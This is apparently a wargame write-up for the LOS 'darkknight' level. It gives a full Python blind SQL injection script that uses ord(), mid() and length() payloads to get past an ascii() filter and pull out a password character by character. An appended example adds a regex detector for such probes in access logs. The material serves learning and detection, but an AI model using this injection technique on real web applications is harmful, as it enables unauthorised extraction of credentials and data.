12. LOS - darknight
2018. 8. 9. 07:26ㆍWarGame/LOS
This is the 11th LOS problem, darknight.
What changed from the previous ones is that ascii is filtered now as well.
Googling this again, I learned that ascii -> ord works! haha
The payload is below.
```python
import requests
import string

num_alpha = string.digits + string.ascii_letters
password = ""
length = 0

# the challenge URL; ascii() is filtered, so ord() is used instead
resetURL = "http://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php"

# input your own PHPSESSID cookie here
cookies = dict(PHPSESSID="dvs710ccqajrn9434hc3a00r11")

# find the length of pw
for i in range(1, 20):
    URL = resetURL
    payload = "?no=1 || ord(id) like 97 %26%26 length(pw) like " + str(i) + "%23"
    URL += payload
    try:
        response = requests.get(URL, cookies=cookies)
        print("[O] \n" + str(i) + ". connect success!!")
        print(response.text)
    except Exception:
        print("[X] Error Code...OTL")
        continue

    if response.text.find("</h2>") > 0:
        print("passwd's length is : " + str(i))
        length = i
        break

# recover pw one character at a time
for i in range(1, length + 1):
    # ord("0") = 48 & ord("Z") = 90
    for j in num_alpha:
        URL = resetURL
        payload = "?no=1 || ord(id) like 97 %26%26 ord(mid(pw," + str(i) + ", 1)) like " + str(ord(j)) + "%23"
        URL += payload
        response = requests.get(URL, cookies=cookies)
        if response.text.find("</h2>") > 0:
            password += j
            print(str(i) + "'s password is : " + j)
            break

# when you find the password: exploit!!
print(password)
URL = resetURL
payload = "?pw=" + password
URL += payload
response = requests.get(URL, cookies=cookies)
print(response.text)
```
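The shape of the probes this script sends (ord()/mid()/length() inside like comparisons, glued with || and &&, closed with a # comment) is easy to spot in web server access logs. As an added example that is not part of the original post, the following scans constructed log lines for that shape; the log lines, paths, indicator names and the three-indicator threshold are all assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from the post): two carry probes
# like the script's, one is a benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Aug/2018:07:26:01 +0900] "GET /darkknight.php?no=1%20||%20ord(id)%20like%2097%20%26%26%20length(pw)%20like%208%23 HTTP/1.1" 200 512
10.0.0.5 - - [09/Aug/2018:07:26:02 +0900] "GET /darkknight.php?no=1%20||%20ord(id)%20like%2097%20%26%26%20ord(mid(pw,1,1))%20like%2048%23 HTTP/1.1" 200 512
10.0.0.9 - - [09/Aug/2018:07:27:10 +0900] "GET /darkknight.php?pw=guest HTTP/1.1" 200 400
"""

# One regex per building block of a boolean-based blind probe; matching the
# decoded value catches ascii() and its ord() replacement alike.
PROBE_PATTERNS = {
    "char_to_code": re.compile(r"\b(?:ord|ascii)\s*\(", re.I),
    "substring": re.compile(r"\b(?:mid|substr|substring)\s*\(", re.I),
    "length": re.compile(r"\blength\s*\(", re.I),
    "boolean_glue": re.compile(r"\|\||&&|\bor\b|\band\b", re.I),
    "comment_tail": re.compile(r"(?:#|--\s).*$"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def decode_params(log_line):
    """Decoded (name, value) pairs of the request's query string."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    # parse_qsl splits on the raw '&' first, so an encoded %26%26 survives as '&&'
    return parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True)

def probe_indicators(value):
    """Names of the probe building blocks present in one parameter value."""
    return [name for name, rx in PROBE_PATTERNS.items() if rx.search(value)]

def flag_blind_sqli(log_line, min_hits=3):
    """(param, indicators) for the first parameter with at least min_hits
    distinct building blocks, else None; three keeps a lone 'and' from firing."""
    for name, value in decode_params(log_line):
        hits = probe_indicators(value)
        if len(hits) >= min_hits:
            return name, hits
    return None

def scan(log_text):
    """Map 1-based line numbers of flagged requests to (param, indicators)."""
    findings = {}
    for lineno, line in enumerate(log_text.splitlines(), 1):
        hit = flag_blind_sqli(line)
        if hit:
            findings[lineno] = hit
    return findings
```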